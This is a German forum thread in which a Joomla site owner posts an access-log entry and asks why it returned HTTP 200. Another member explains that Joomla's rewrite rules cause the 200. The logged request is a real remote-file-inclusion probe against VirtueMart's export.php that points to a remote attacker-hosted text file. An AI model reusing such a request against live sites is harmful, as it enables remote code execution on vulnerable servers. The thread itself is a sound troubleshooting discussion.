Erfolgreicher Hack oder Sicherheitslücke? access_log

G

gammla

Member
Hallo,
ich glaube ein Problem mit meiner Serverkonfiguration zu haben.
In meinen Logfiles wird der Code 200 zurück gegeben, obwohl eigentlich eine 400 kommen sollte.

PHP: 
xxx.xxx.xxx.xxx - - [10/Mar/2010:00:52:46 +0100] "GET /download/cat_view//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 200 - "-" "Mozilla/5.0"

Der "Angreifer" wollte wohl "nur" mal testen, ob sein echo ausgegeben wird und weiter Unheil getrieben werden kann.

Allerdings irritiert mich die 200 als Rückgabewert.
Ist das normal?

Unter der Domain läuft Joomla 1.5.15

Gruß,

gammla
 
gammla said:
Allerdings irritiert mich die 200 als Rückgabewert.
Ist das normal?
Click to expand...
Ja, was sonst?
Das Script /download/cat_view//administrator/components/com_virtuemart/export.php gibt es ja und wird ausgeführt. Ergo kommt auch ein 200er Status-Code.

Und selbst wenn es das nicht gibt, Du aber die RewriteRules von Joomla aktiviert hast, wird ebenfalls immer ein 200er ausgegeben.

huschi.
 
Hallo,

Das Script /download/cat_view//administrator/components/com_virtuemart/export.php gibt es ja und wird ausgeführt. Ergo kommt auch ein 200er Status-Code.
Click to expand...
Trifft in meinem Fall nicht zu! Virtuemart ist nicht installiert. Hätte ich dazu sagen sollen! Sorry!

Und selbst wenn es das nicht gibt, Du aber die RewriteRules von Joomla aktiviert hast, wird ebenfalls immer ein 200er ausgegeben.
Click to expand...
Das ist bei mir der Fall und klärt somit die Sache!

Vielen Dank!

Gruß,

gammla
 
You must log in or register to reply here.
Back
Top